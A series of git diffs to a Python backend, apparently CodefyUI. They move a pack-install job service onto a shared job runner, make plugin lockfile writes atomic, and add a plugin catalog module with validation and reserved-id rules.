     def _read(self, job: PackJob, after_cursor: int, limit: int
               ) -> tuple[list[dict], int, str]:
         """One consistent look at the buffer AND the job's status.
 
-        Both under the same lock hold, which is what makes "terminal status
-        implies the terminal event is already readable" true for a caller.
-
-        The identity check closes a narrow window in ``wait_for_events``: a
-        poll parked on a job that finishes, followed by a submit that clears
-        the buffer, would otherwise resume and hand the NEW job's events back
-        under the OLD job's id. There are no events for that job any more, so
-        the honest answer is the same one an id we never had gets.
+        A pass-through to the runner, kept here because it is what a test
+        reaches for to reproduce the replaced-job window: an interleaving the
+        public API cannot be made to produce on demand.
         """
-        with self._lock:
-            if self._job is not job:
-                raise UnknownJob(job.job_id)
-            page = [event for event in self._events
-                    if event["cursor"] > after_cursor][:limit]
-            status = job.status
-        return page, (page[-1]["cursor"] if page else after_cursor), status
+        return self._runner._read(job, after_cursor, limit)
 
     # ── submitting ────────────────────────────────────────────────────────
 
@@ -286,7 +221,7 @@ class PackService:
 
         Only one thing here is awaited, and it is the branch that hands over
         to :meth:`_submit_restart` -- which returns or raises. Everything on
-        the live path from the busy check to the ``self._job`` assignment
+        the live path from the busy check to the runner's ``claim``
         therefore runs without a suspension point between them, which is the
         whole of what makes "one install at a time" true: two requests cannot
         both pass the check before either takes the slot.
@@ -308,7 +243,11 @@ class PackService:
         :raises ValueError: an item id this pack does not have, or a
             restart-mode install with no packages to install.
         """
-        running = self._job
+        # The runner refuses a second claim too, in its own words. This check
+        # is the one that answers the CLIENT: it happens before anything is
+        # resolved or disk-checked, and it raises the refusal the routes map
+        # to a 409 naming the install to follow.
+        running = self.current_job()
         if running is not None and not running.terminal:
             raise PackBusy(running.job_id)
 
@@ -346,19 +285,13 @@ class PackService:
 
         job = PackJob(job_id=uuid.uuid4().hex, pack_id=pack.pack_id,
                       items=tuple(item.item_id for item in targets), mode=mode)
-        loop = asyncio.get_running_loop()
-        broadcast = _Broadcast()
-
-        with self._lock:
-            self._job = job
-            self._events.clear()
-            self._cursor = 0
-            self._broadcast = broadcast
-            self._store({"type": "job_started", "pack_id": pack.pack_id,
-                         "items": list(job.items)}, job)
         # job_started is in the buffer before the flow can emit anything, so
         # a client that polls from cursor 0 always sees it first.
-        self._task = asyncio.create_task(self._run(job, pack, loop, broadcast))
+        self._runner.claim(job, {"type": "job_started",
+                                 "pack_id": pack.pack_id,
+                                 "items": list(job.items)})
+        self._runner.start(job, self._flow_work(job, pack),
+                           on_settled=self._settled)
         return job
 
     async def _submit_restart(self, pack: Pack, variant: str | None) -> PackJob:
@@ -409,12 +342,12 @@ class PackService:
         kind = self._restart_kind(pack)
 
         # Nothing from here to the end of the method awaits, so the checks
-        # below and the assignment of ``self._job`` cannot be interleaved
-        # with another submit -- the same property that makes "one job at a
-        # time" hold in ``submit_install``. The busy check is repeated
-        # because the probe above IS a suspension point: a live install may
-        # have started during it, and stopping the server would kill it.
-        running = self._job
+        # below and the runner's claim cannot be interleaved with another
+        # submit -- the same property that makes "one job at a time" hold in
+        # ``submit_install``. The busy check is repeated because the probe
+        # above IS a suspension point: a live install may have started during
+        # it, and stopping the server would kill it.
+        running = self.current_job()
         if running is not None and not running.terminal:
             raise PackBusy(running.job_id)
 
@@ -459,25 +392,15 @@ class PackService:
         log.info("restart-mode install of %s handed to helper pid %s (job %s)",
                  pack.pack_id, helper_pid, job.job_id)
         job.restart_command = command
-        # There is no task for this job. Leaving the previous job's finished
-        # one in place would have ``shutdown`` await something that belongs
-        # to a job nobody can read any more.
-        self._task = None
 
-        broadcast = _Broadcast()
-        with self._lock:
-            self._job = job
-            self._events.clear()
-            self._cursor = 0
-            self._broadcast = broadcast
-            self._store({"type": "job_started", "pack_id": pack.pack_id,
-                         "items": []}, job)
+        self._runner.claim(job, {"type": "job_started",
+                                 "pack_id": pack.pack_id, "items": []})
         # Terminal immediately, and under the lock like every other terminal
         # event: a client that sees ``needs_restart`` has already been handed
         # the event that names the command, the kind and the file.
-        self._finish(job, STATUS_NEEDS_RESTART,
-                     {"type": "needs_restart", "command": command,
-                      "kind": kind, "pending_path": str(pending_path)})
+        self._runner.finish(job, STATUS_NEEDS_RESTART,
+                            {"type": "needs_restart", "command": command,
+                             "kind": kind, "pending_path": str(pending_path)})
 
         restart.schedule_self_shutdown(loop)
         return job
@@ -542,28 +465,48 @@ class PackService:
 
     # ── running ───────────────────────────────────────────────────────────
 
-    async def _run(self, job: PackJob, pack: Pack, loop, broadcast: _Broadcast
-                   ) -> None:
-        """Run the flow on a worker thread and record how it ended.
+    def _flow_work(self, job: PackJob, pack: Pack) -> Work:
+        """The unit of work the runner hands to ``asyncio.to_thread``.
 
-        Swallows every ``Exception``: this is a bare task nobody awaits
-        except ``shutdown``, and an escaping one would be reported as "task
-        exception was never retrieved" long after the job disappeared from
-        the UI.
+        A closure rather than a partial: ``run_flow`` is injectable and the
+        runner knows nothing about packs, so this is the one place the flow's
+        own argument shape -- ``(pack, item_ids, emit=, cancel_check=)`` --
+        is spelled out.
 
-        A ``BaseException`` -- KeyboardInterrupt, SystemExit, CancelledError
-        -- is recorded and then RE-RAISED. Those are not ours to swallow, and
-        the job reaches a terminal state either way, which is the part that
-        matters to anyone still watching it.
+        ``list(job.items)`` and not the tuple, because that is the type the
+        flow has always been handed and what a scripted test flow records.
         """
-        emit = self._emitter(job, loop, broadcast)
-        try:
-            await asyncio.to_thread(
-                self._run_flow, pack, list(job.items),
-                emit=emit, cancel_check=job.cancel_event.is_set)
-        except PackCancelled:
-            self._finish(job, STATUS_CANCELLED, {"type": "job_cancelled"})
-        except PackNeedsRestart as exc:
+
+        def work(emit: Emit, cancel_check: CancelCheck) -> None:
+            self._run_flow(pack, list(job.items),
+                           emit=emit, cancel_check=cancel_check)
+
+        return work
+
+    def _terminal_for(self, exc: BaseException) -> tuple[str, dict] | None:
+        """What an exception out of the flow did to the job, and what to say.
+
+        Handed to the runner at construction. The runner owns the lock
+        discipline, the buffer and the cursor; this owns the failure shapes
+        of ``packs.errors`` and what each of them tells the person watching
+        -- which is the whole reason the runner takes a callback instead of
+        importing this module.
+
+        The job it is about is :meth:`current_job`. The runner only asks
+        while the CURRENT job's worker thread is unwinding, and a submit is
+        refused until that job is terminal -- which is what the answer to
+        this call is about to make it -- so the job that raised is still the
+        one in the slot.
+
+        ``None`` means "not one of ours": KeyboardInterrupt, SystemExit,
+        CancelledError. The runner records the job as failed and re-raises
+        it, which is what those deserve; the warning is logged here because
+        this is what knows what to call the job.
+        """
+        job = self.current_job()
+        if isinstance(exc, PackCancelled):
+            return STATUS_CANCELLED, {"type": "job_cancelled"}
+        if isinstance(exc, PackNeedsRestart):
             # Checked before PackInstallError: it is a subclass, and "not
             # while the server is running" is not a failure.
             job.restart_command = exc.command
@@ -576,112 +519,36 @@ class PackService:
                 # the client's question is "is retry_mode set?" and not "is
                 # it set and also not null".
                 event["retry_mode"] = "restart"
-            self._finish(job, STATUS_NEEDS_RESTART, event)
-        except PackInstallError as exc:
-            self._fail(job, str(exc), exc.hint)
-        except Exception as exc:
+            return STATUS_NEEDS_RESTART, event
+        if isinstance(exc, PackInstallError):
+            return STATUS_FAILED, {"type": "job_failed",
+                                   "message": str(exc), "hint": exc.hint}
+        if isinstance(exc, Exception):
             # Not a failure shape anybody designed, so it goes to the log in
             # full and to the user as its repr -- str() of a bare KeyError is
             # just a quoted key and says nothing about what broke.
             log.exception("pack install job %s raised", job.job_id)
-            self._fail(job, repr(exc), None)
-        except BaseException as exc:
-            # KeyboardInterrupt, SystemExit, CancelledError. The job is over
-            # either way, and a job left saying "running" forever is worse
-            # than one that says why it stopped -- the panel would offer a
-            # Stop button for a thread that no longer exists, and no submit
-            # would ever be accepted again. Record, then let it travel: these
-            # are not ours to swallow.
-            log.warning("pack install job %s ended on %s", job.job_id,
-                        type(exc).__name__)
-            self._fail(job, repr(exc), None)
-            raise
-        else:
-            self._finish(job, STATUS_DONE, {"type": "job_done"})
-        finally:
-            # Finished, failed or cancelled, the disk is not what it was and
-            # the next status poll has to see that. The flow invalidates too;
-            # doing it here as well covers an injected flow and costs one
-            # dict drop.
-            state.invalidate()
+            return STATUS_FAILED, {"type": "job_failed",
+                                   "message": repr(exc), "hint": None}
+        # KeyboardInterrupt, SystemExit, CancelledError. The job is over
+        # either way, and a job left saying "running" forever is worse than
+        # one that says why it stopped -- the panel would offer a Stop button
+        # for a thread that no longer exists, and no submit would ever be
+        # accepted again. The runner records it, then lets it travel: these
+        # are not ours to swallow.
+        log.warning("pack install job %s ended on %s", job.job_id,
+                    type(exc).__name__)
+        return None
 
-    def _emitter(self, job: PackJob, loop, broadcast: _Broadcast
-                 ) -> Callable[[dict], None]:
-        """The ``emit`` the flow is handed. Called from the worker thread.
+    @staticmethod
+    def _settled() -> None:
+        """Drop the probe cache once the job is terminal, however it ended.
 
-        Closes over the JOB as well as its generation's loop and broadcast,
-        so an event says which job produced it. A closure is the only thing
-        that can: the caller is a reader thread that may outlive the job --
-        ``runner._pump`` is a daemon thread joined with a timeout -- and by
-        the time its event reaches ``_store`` the service's idea of the
-        current job may already be somebody else's.
+        Finished, failed or cancelled, the disk is not what it was and the
+        next status poll has to see that. The flow invalidates too; doing it
+        here as well covers an injected flow and costs one dict drop.
         """
-
-        def emit(event: dict) -> None:
-            with self._lock:
-                self._store(event, job)
-            try:
-                loop.call_soon_threadsafe(broadcast.notify)
-            except RuntimeError:
-                # The loop is closed (the server is going down, or a test
-                # ended while the thread was still unwinding). Nobody is left
-                # to wake; the event is stored either way.
-                pass
-
-        return emit
-
-    def _store(self, event: dict, job: PackJob | None) -> None:
-        """Stamp *event* and buffer it. CALLER HOLDS ``self._lock``.
-
-        *job* is the job that PRODUCED the event, which is not always the
-        current one: a finished job's reader thread can still be emitting.
-        Buffering is unconditional -- the buffer belongs to whatever job is
-        current, and a stray line in it is visible and harmless -- but the
-        step bookkeeping is not. ``current_step`` is what
-        ``GET /api/packs`` turns into an item's "downloading" badge, so a
-        late event stamping it on the next job would put that badge on an
-        item of a pack the old job never touched.
-        """
-        self._cursor += 1
-        self._events.append({**event, "cursor": self._cursor, "ts": _now_iso()})
-
-        if job is None or job is not self._job:
-            return
-        kind = event.get("type")
-        if kind == "step_started":
-            job.current_step = event.get("step")
-        elif kind == "step_done" and job.current_step == event.get("step"):
-            job.current_step = None
-
-    def _finish(self, job: PackJob, status: str, event: dict) -> None:
-        """Record the terminal event and the status, atomically.
-
-        The event goes in FIRST and the status flips under the same lock, so
-        a poller that sees a terminal status has already been handed the
-        event explaining it.
-
-        Called from ``_run``, which runs ON the loop, so the wake-up needs no
-        thread hand-off. ``self._broadcast`` is still this job's generation:
-        only a submit replaces it, and a submit is refused until the current
-        job is terminal -- which is what this method is about to make true.
-
-        The other caller is ``_submit_restart``, where that argument runs the
-        other way round and still holds: the generation was replaced by the
-        submit itself, moments earlier and under the same lock, and this job
-        was terminal on arrival. It has no ``_run`` and no worker thread --
-        the install happens in another process, after this one is gone -- so
-        this is the only place its status is ever set.
-        """
-        with self._lock:
-            self._store(event, job)
-            job.status = status
-            job.finished_at = time.time()
-        self._broadcast.notify()
-
-    def _fail(self, job: PackJob, message: str, hint: str | None) -> None:
-        job.error = {"message": message, "hint": hint}
-        self._finish(job, STATUS_FAILED,
-                     {"type": "job_failed", "message": message, "hint": hint})
+        state.invalidate()
 
     # ── stopping ──────────────────────────────────────────────────────────
 
@@ -692,43 +559,14 @@ class PackService:
         and it is the FLOW that ends the job, so the status may still say
         running when this returns. Asking twice is not an error.
         """
-        job = self.get_job(job_id)
-        if job.terminal:
-            return False
-        job.cancel_event.set()
-        return True
+        return await self._runner.cancel(job_id)
 
     async def shutdown(self) -> None:
         """Stop a running install and wait for it, bounded.
 
         Bounded because the server is coming down either way: a flow that
         ignores its cancel check must not be able to hold the process open.
-        The task is SHIELDED from the timeout -- cancelling it would not stop
-        the worker thread anyway, and would leave the job with no terminal
-        event at all.
-
-        Nothing the awaited task raises escapes. ``_run`` swallows every
-        ``Exception`` itself but deliberately RE-RAISES a ``BaseException``
-        (KeyboardInterrupt, SystemExit, CancelledError) after recording the
-        job, and this is the one place that await happens -- inside the
-        lifespan shutdown hook. Letting one through would turn "the server
-        is coming down" into a traceback on the way out, of an install that
-        has already reached a terminal state and told everyone watching.
+        See :meth:`app.core.jobs.JobRunner.shutdown` for what the bound
+        protects and why nothing the job raised escapes here.
         """
-        job, task = self._job, self._task
-        if job is not None and not job.terminal:
-            job.cancel_event.set()
-        if task is None or task.done():
-            return
-        try:
-            await asyncio.wait_for(asyncio.shield(task),
-                                   self._shutdown_timeout_s)
-        except asyncio.TimeoutError:
-            log.warning("pack install job did not stop within %.0fs; "
-                        "leaving it to the interpreter",
-                        self._shutdown_timeout_s)
-        except BaseException:
-            # BaseException, not Exception: _run re-raises those on purpose
-            # (see the docstring), so ``except Exception`` here catches only
-            # the cases _run already handled and misses the ones it forwards.
-            log.exception("pack install job failed during shutdown")
+        await self._runner.shutdown()

--- a/backend/app/core/plugin_loader.py
+++ b/backend/app/core/plugin_loader.py
@@ -90,18 +90,56 @@ def load_lockfile() -> dict[str, Any]:
 
 
 def save_lockfile(data: dict[str, Any]) -> None:
+    """Write the lockfile, atomically.
+
+    A temp file in the SAME directory and then ``os.replace``, because this
+    file is the only record of what is installed: a crash, a full disk or a
+    killed process partway through a ``write_text`` leaves half a JSON
+    document, and half a JSON document is an empty lockfile to
+    :func:`load_lockfile` -- every plugin the user has, gone, with their
+    files still on disk. ``os.replace`` is atomic on both platforms and
+    overwrites an existing file on Windows too, so a reader sees either the
+    old document or the new one and never the write in progress.
+
+    The temp name carries the pid so two processes writing at once (the CLI
+    and the server both do) cannot land on each other's partial file. That is
+    not a substitute for a lock -- two writers can still lose one edit
+    between a read and a write -- but it does mean neither of them can ever
+    read a torn file.
+    """
     p = lockfile_path()
     p.parent.mkdir(parents=True, exist_ok=True)
-    p.write_text(json.dumps(data, indent=2, ensure_ascii=False), encoding="utf-8")
+    tmp = p.with_suffix(f"{p.suffix}.tmp-{os.getpid()}")
+    try:
+        tmp.write_text(json.dumps(data, indent=2, ensure_ascii=False), encoding="utf-8")
+        os.replace(tmp, p)
+    except BaseException:
+        # Whatever went wrong, the caller's failure is the one worth
+        # reporting -- and a temp file left in the plugins directory would
+        # outlive it silently.
+        try:
+            tmp.unlink(missing_ok=True)
+        except OSError:
+            pass
+        raise
 
 
 def read_manifest_safe(plugin_dir: Path) -> dict[str, Any]:
-    """Parse a plugin's manifest, returning {} on any read/parse failure."""
+    """Parse a plugin's manifest, returning {} on any read/parse failure.
+
+    ``ValueError`` covers two of those failures rather than one:
+    ``TOMLDecodeError`` is a subclass, and so is the ``UnicodeDecodeError``
+    that a manifest with a byte that is not UTF-8 raises out of
+    ``read_text``. That one used to escape, and every reader here is a
+    listing -- ``GET /api/plugins``, ``GET /api/plugins/catalog``,
+    ``cdui plugin list`` -- so one unreadable pack took the whole list down
+    with it instead of appearing as a pack with no metadata.
+    """
     try:
         return tomllib.loads(
             (plugin_dir / MANIFEST_FILENAME).read_text(encoding="utf-8")
         )
-    except (OSError, tomllib.TOMLDecodeError):
+    except (OSError, ValueError):
         return {}
 
 

--- a/backend/app/core/plugins/__init__.py
+++ b/backend/app/core/plugins/__init__.py
@@ -19,7 +19,10 @@ The submodules, in dependency order: :mod:`errors` (stdlib only),
 :mod:`deps`, :mod:`consent`, :mod:`manifest`, :mod:`catalog`, :mod:`sources`,
 :mod:`github`, :mod:`gate`, and :mod:`inspect`, which is the one that reads
 a source through several of the others and answers "what would installing
-this do?" in a single value.
+this do?" in a single value. Three more answer about an install that already
+happened: :mod:`lifecycle` (enable, disable, uninstall -- the writes),
+:mod:`listing` (one row per plugin, installed or not, for the Plugin Center)
+and :mod:`reload` (the one re-discovery call every caller shares).
 
 Only the error classes are re-exported here, so ``from app.core.plugins
 import ManifestError`` stays a cheap import that pulls in neither the AST

--- a/backend/app/core/plugins/__init__.py
+++ b/backend/app/core/plugins/__init__.py
@@ -1,0 +1,50 @@
+"""Plugin logic the server and the CLI both need, with neither one inside it.
+
+Everything about a plugin used to live in ``scripts/plugins.py``: what a
+manifest may say, what ``owner/repo@ref`` means, which packs the catalog
+ships, and which files the AST gate will refuse. None of it was reachable
+from the FastAPI app -- ``scripts/`` is only on ``sys.path`` when the CLI or
+the test suite puts it there -- so a Plugin Center in the browser would have
+had to grow a second copy of every one of those rules, and a second copy of a
+SECURITY rule is the kind that drifts quietly.
+
+So the rules moved here and ``cdui plugin`` became a front end over them. The
+split is by ANSWER, not by caller: this package decides what is true (is this
+manifest valid, what does this spec name, may this file be imported), and the
+caller decides how to say it. That is why nothing in here formats bilingual
+prose or prints -- the CLI's zh/en pairs stay in the CLI, the routes'
+envelopes stay in the routes, and both read the same structured answer.
+
+The submodules, in dependency order: :mod:`errors` (stdlib only),
+:mod:`manifest`, :mod:`catalog`, :mod:`sources`, :mod:`gate`.
+
+Only the error classes are re-exported here, so ``from app.core.plugins
+import ManifestError`` stays a cheap import that pulls in neither the AST
+validator nor the filesystem.
+"""
+
+from __future__ import annotations
+
+from .errors import (
+    ConsentRequired,
+    GitHubError,
+    ManifestError,
+    PluginCancelled,
+    PluginInstallError,
+    PluginNeedsRestart,
+    SourceError,
+    UnknownCatalogName,
+    UnparseableSource,
+)
+
+__all__ = [
+    "ConsentRequired",
+    "GitHubError",
+    "ManifestError",
+    "PluginCancelled",
+    "PluginInstallError",
+    "PluginNeedsRestart",
+    "SourceError",
+    "UnknownCatalogName",
+    "UnparseableSource",
+]

--- a/backend/app/core/plugins/__init__.py
+++ b/backend/app/core/plugins/__init__.py
@@ -16,7 +16,10 @@ prose or prints -- the CLI's zh/en pairs stay in the CLI, the routes'
 envelopes stay in the routes, and both read the same structured answer.
 
 The submodules, in dependency order: :mod:`errors` (stdlib only),
-:mod:`manifest`, :mod:`catalog`, :mod:`sources`, :mod:`gate`.
+:mod:`deps`, :mod:`consent`, :mod:`manifest`, :mod:`catalog`, :mod:`sources`,
+:mod:`github`, :mod:`gate`, and :mod:`inspect`, which is the one that reads
+a source through several of the others and answers "what would installing
+this do?" in a single value.
 
 Only the error classes are re-exported here, so ``from app.core.plugins
 import ManifestError`` stays a cheap import that pulls in neither the AST

--- a/backend/app/core/plugins/catalog.py
+++ b/backend/app/core/plugins/catalog.py
@@ -282,6 +282,70 @@ def github_catalog_packs() -> list[CatalogEntry]:
     )
 
 
+#: What owns a reserved id, in the words :func:`reserved_id_holder` answers
+#: with. Constants rather than literals at each site because two callers turn
+#: them into sentences -- the CLI into a bilingual pair, the installer into a
+#: hint -- and a reason spelled differently in two places reads as two rules.
+RESERVED_BY_ROUTE = "a route under /api/plugins/"
+RESERVED_BY_BUILTIN_PACK = "a pack that ships with CodefyUI"
+
+
+def reserved_id_holder(
+    plugin_id: str,
+    *,
+    owner: str | None = None,
+    repo: str | None = None,
+    catalog: dict[str, CatalogEntry] | None = None,
+) -> str | None:
+    """What already owns *plugin_id*, or ``None`` when nothing does.
+
+    The whole reserved-id decision, in one function, because it decides which
+    code a plugin id resolves to: the CLI had three clauses and the
+    inspection had two, which is the shape a rule takes just before the
+    looser copy becomes the one an installer happens to call.
+
+    Three clauses, in order of who owns the name:
+
+    * a fixed path segment under ``/api/plugins/``
+      (:data:`RESERVED_PLUGIN_IDS`) -- the router would decide which of the
+      two answered, not the install;
+    * a ``builtin`` catalog row -- that id names a directory this release
+      ships, and the filesystem would decide which pack loaded;
+    * a ``github`` catalog row whose repository is not the one being
+      installed. That id is NOT reserved outright, and cannot be: the author
+      of an official plugin has to be able to install their own repository
+      under the id the catalog lists it by. It is reserved AGAINST everyone
+      else, because the id is what the lockfile, the catalog card and
+      ``/api/plugins/{id}`` all key on, so a fork claiming it takes the
+      official pack's place quietly. Reached only when both *owner* and
+      *repo* are given: a caller with no repository in hand (``link``,
+      ``new``) is asking the first two questions only, and for those a
+      github catalog id is free.
+
+    The answer is an English noun phrase for the caller to wrap in its own
+    sentence -- ``ConsentRequired``-style structure would be nicer and is not
+    worth it for three cases that every caller renders as prose anyway.
+
+    *catalog* overrides the rows this reads, for ``scripts/plugins.py``,
+    whose tests fake the catalog by patching the CLI's own loader. The rows
+    are the VALIDATED ones either way, which is the view the installer
+    dispatches on: a row too malformed to install from is a row this build
+    cannot claim an id with either.
+    """
+    if plugin_id in RESERVED_PLUGIN_IDS:
+        return RESERVED_BY_ROUTE
+    entries = catalog_entries() if catalog is None else catalog
+    entry = entries.get(plugin_id.lower())
+    if entry is None:
+        return None
+    if entry.kind == "builtin":
+        return RESERVED_BY_BUILTIN_PACK
+    if owner and repo and entry.repo:
+        if f"{owner}/{repo}".lower() != entry.repo.lower():
+            return f"the repository {entry.repo}"
+    return None
+
+
 def catalog_entry(plugin_id: str) -> CatalogEntry | None:
     """One entry by id, case-insensitively, or ``None``.
 

--- a/backend/app/core/plugins/catalog.py
+++ b/backend/app/core/plugins/catalog.py
@@ -133,12 +133,12 @@ def available_builtin_packs(
     a reader that raises is swallowed like every other failure here.
     """
     try:
-        catalog = builtin_catalog_packs(
-            (load_catalog if read_catalog is None else read_catalog)()
-        )
-        lockfile = (
+        catalog_reader = load_catalog if read_catalog is None else read_catalog
+        lockfile_reader = (
             plugin_loader.load_lockfile if read_lockfile is None else read_lockfile
-        )()
+        )
+        catalog = builtin_catalog_packs(catalog_reader())
+        lockfile = lockfile_reader()
         installed = lockfile.get("plugins", {})
         tombstoned = plugin_loader.removed_ids(lockfile)
     except Exception:  # never let discoverability break a caller
@@ -244,7 +244,7 @@ def validate_catalog(data: Any) -> dict[str, CatalogEntry]:
             if not isinstance(repo, str) or not _REPO_RE.match(repo):
                 logger.warning(
                     "plugin catalog: dropping %r -- a github entry needs "
-                    "repo = \"owner/repo\", got %r",
+                    "repo = 'owner/repo', got %r",
                     plugin_id,
                     repo,
                 )

--- a/backend/app/core/plugins/catalog.py
+++ b/backend/app/core/plugins/catalog.py
@@ -210,7 +210,11 @@ def validate_catalog(data: Any) -> dict[str, CatalogEntry]:
             )
             continue
         kind = entry.get("kind")
-        if kind not in _KINDS:
+        # ``isinstance`` first, and not for tidiness: ``[] in a_frozenset``
+        # raises TypeError for an unhashable value, so ``kind = []`` in a
+        # hand-edited registry took down the reader whose whole promise is
+        # that it drops bad rows instead of raising over them.
+        if not isinstance(kind, str) or kind not in _KINDS:
             logger.warning(
                 "plugin catalog: dropping %r -- unknown kind %r", plugin_id, kind
             )
@@ -265,9 +269,12 @@ def catalog_entries() -> dict[str, CatalogEntry]:
 def github_catalog_packs() -> list[CatalogEntry]:
     """The catalog's ``kind = "github"`` entries, sorted by id.
 
-    Empty in a stock build: the catalog ships only in-repo packs today. It is
-    here because the shape is already in the schema, and a Plugin Center that
-    lists third-party packs must not have to re-derive what one looks like.
+    Three of them ship in a stock build -- ``graph-copilot``,
+    ``official-template`` and ``self-learning``, the plugins CodefyUI
+    publishes in their own repositories -- and the sort is by id because that
+    is what a person types. These are the rows that cost a download and a
+    consent decision, which is why asking for them separately is worth a
+    function: nothing may install one without being asked.
     """
     return sorted(
         (entry for entry in catalog_entries().values() if entry.kind == "github"),

--- a/backend/app/core/plugins/catalog.py
+++ b/backend/app/core/plugins/catalog.py
@@ -27,15 +27,13 @@ from __future__ import annotations
 
 import json
 import logging
-import re
-from collections.abc import Callable
 from dataclasses import dataclass
 from pathlib import Path
-from typing import Any
+from typing import Any, Literal
 
 from app.core import plugin_loader
 
-from .manifest import PLUGIN_ID_RE
+from .manifest import PLUGIN_ID_RE, REPO_RE
 
 logger = logging.getLogger(__name__)
 
@@ -47,9 +45,6 @@ logger = logging.getLogger(__name__)
 RESERVED_PLUGIN_IDS = frozenset({
     "catalog", "inspect", "install", "jobs", "generation", "reload",
 })
-
-#: ``owner/repo``, in the characters GitHub allows in either half.
-_REPO_RE = re.compile(r"^[\w.-]+/[\w.-]+$")
 
 #: The two things a catalog entry can be. Anything else is a newer catalog
 #: read by an older build, and an entry this build cannot install is worse
@@ -108,9 +103,7 @@ def builtin_catalog_packs(
 
 
 def available_builtin_packs(
-    *,
-    read_catalog: Callable[[], dict[str, Any]] | None = None,
-    read_lockfile: Callable[[], dict[str, Any]] | None = None,
+    catalog: dict[str, Any], lockfile: dict[str, Any]
 ) -> list[tuple[str, str]]:
     """Built-in packs shipped on disk that this install has made no decision about.
 
@@ -127,24 +120,16 @@ def available_builtin_packs(
 
     Returns ``(id, display name)`` pairs, sorted, so callers can name them.
 
-    The two readers are injectable because this is the one function the CLI
-    re-exports whose inputs its tests fake by patching ``plugins.load_catalog``
-    / ``plugins.load_lockfile``. They are resolved INSIDE the guard below, so
-    a reader that raises is swallowed like every other failure here.
+    Takes both documents rather than reading either: this answer is wanted by
+    a CLI notice, by ``cdui plugin sync`` and by a route, and each of those
+    already has the catalog and the lockfile in hand. Whether a failure to
+    READ one of them is fatal is likewise the caller's call -- the CLI
+    swallows it, because a notice must never take the command down with it.
     """
-    try:
-        catalog_reader = load_catalog if read_catalog is None else read_catalog
-        lockfile_reader = (
-            plugin_loader.load_lockfile if read_lockfile is None else read_lockfile
-        )
-        catalog = builtin_catalog_packs(catalog_reader())
-        lockfile = lockfile_reader()
-        installed = lockfile.get("plugins", {})
-        tombstoned = plugin_loader.removed_ids(lockfile)
-    except Exception:  # never let discoverability break a caller
-        return []
+    installed = lockfile.get("plugins", {})
+    tombstoned = plugin_loader.removed_ids(lockfile)
     out: list[tuple[str, str]] = []
-    for pack_id, entry in catalog.items():
+    for pack_id, entry in builtin_catalog_packs(catalog).items():
         if pack_id in installed or pack_id in tombstoned:
             continue
         out.append((pack_id, str(entry.get("name") or pack_id)))
@@ -166,7 +151,7 @@ class CatalogEntry:
     id: str
     name: str
     description: str
-    kind: str                        # "builtin" | "github"
+    kind: Literal["builtin", "github"]
     path: str | None = None          # builtin: repo-relative pack directory
     repo: str | None = None          # github: "owner/repo"
     ref: str = ""                    # github: tag/branch; "" = default branch
@@ -241,7 +226,7 @@ def validate_catalog(data: Any) -> dict[str, CatalogEntry]:
                 continue
             repo = None
         else:
-            if not isinstance(repo, str) or not _REPO_RE.match(repo):
+            if not isinstance(repo, str) or not REPO_RE.match(repo):
                 logger.warning(
                     "plugin catalog: dropping %r -- a github entry needs "
                     "repo = 'owner/repo', got %r",

--- a/backend/app/core/plugins/catalog.py
+++ b/backend/app/core/plugins/catalog.py
@@ -1,0 +1,301 @@
+"""``plugins/registry.json``: the packs this build says it ships.
+
+An index, not a package manager. A ``builtin`` entry names a directory that
+came with the release and is activated in place; a ``github`` entry names a
+repository the installer may fetch. Nothing else can be installed by NAME, so
+this file is the whole of what ``cdui plugin install <word>`` can reach.
+
+Two readers with two different needs, which is why there are two shapes:
+
+* :func:`load_catalog` hands back the parsed JSON exactly as it is on disk.
+  Every caller that predates this module reads it that way -- and a test that
+  fakes a catalog fakes a plain dict -- so the raw shape stays supported and
+  keeps its old habit of answering an empty catalog rather than raising when
+  the file is missing or corrupt. A CLI that cannot install anything is bad;
+  a CLI that traces back on ``cdui plugin list`` is worse.
+* :func:`validate_catalog` turns the same dict into :class:`CatalogEntry`
+  records, DROPPING anything malformed with a log line. That is what a GUI
+  needs: a card per pack, with fields it can render without asking whether
+  ``tags`` is a list this time. Dropping rather than raising for the same
+  reason as above -- one typo in one entry must not empty the Plugin Center.
+
+Reading the file is the only thing here that touches the disk, and nothing
+touches the network.
+"""
+
+from __future__ import annotations
+
+import json
+import logging
+import re
+from collections.abc import Callable
+from dataclasses import dataclass
+from pathlib import Path
+from typing import Any
+
+from app.core import plugin_loader
+
+from .manifest import PLUGIN_ID_RE
+
+logger = logging.getLogger(__name__)
+
+#: Ids a plugin may never claim: each one is a fixed path segment under
+#: ``/api/plugins/``, so a pack called ``install`` would sit where the install
+#: route already lives and the router -- not the plugin -- would decide which
+#: one wins. Reserved by NAME here rather than by trying to detect the clash
+#: later, because the clash is only visible from the routing table.
+RESERVED_PLUGIN_IDS = frozenset({
+    "catalog", "inspect", "install", "jobs", "generation", "reload",
+})
+
+#: ``owner/repo``, in the characters GitHub allows in either half.
+_REPO_RE = re.compile(r"^[\w.-]+/[\w.-]+$")
+
+#: The two things a catalog entry can be. Anything else is a newer catalog
+#: read by an older build, and an entry this build cannot install is worse
+#: than no entry: it would render as a card whose button does nothing.
+_KINDS = frozenset({"builtin", "github"})
+
+
+def catalog_path(builtin_root: Path | None = None) -> Path:
+    """Where ``registry.json`` is read from.
+
+    *builtin_root* overrides the install's own plugin directory. It exists
+    for one caller: ``scripts/plugins.py`` re-exports this under its old name
+    and its tests redirect the built-in root by patching the CLI's copy of
+    ``plugins_builtin_root``, so the CLI passes its own answer in rather than
+    letting this module reach past the patch to the real repository.
+    """
+    root = plugin_loader.plugins_builtin_root() if builtin_root is None else builtin_root
+    return root / "registry.json"
+
+
+def load_catalog(builtin_root: Path | None = None) -> dict[str, Any]:
+    """The parsed ``registry.json``, or an empty catalog.
+
+    Every failure -- no file, unreadable file, invalid JSON -- is the same
+    answer, deliberately: this is read on the way to ``plugin list``,
+    ``search`` and every ``install``, and a catalog nobody can read means
+    "there are no packs to install by name", which those commands can say.
+    Raising here would take down commands that have nothing to do with the
+    catalog.
+    """
+    p = catalog_path(builtin_root)
+    if not p.exists():
+        return {"schema": 1, "plugins": {}}
+    try:
+        return json.loads(p.read_text(encoding="utf-8"))
+    except (json.JSONDecodeError, OSError):
+        return {"schema": 1, "plugins": {}}
+
+
+def builtin_catalog_packs(
+    catalog: dict[str, Any] | None = None,
+) -> dict[str, dict[str, Any]]:
+    """The ``kind = "builtin"`` half of the catalog -- packs that ship in-repo.
+
+    *catalog* overrides the parsed registry, for the same reason
+    :func:`catalog_path` takes a root: the CLI's tests patch the CLI's
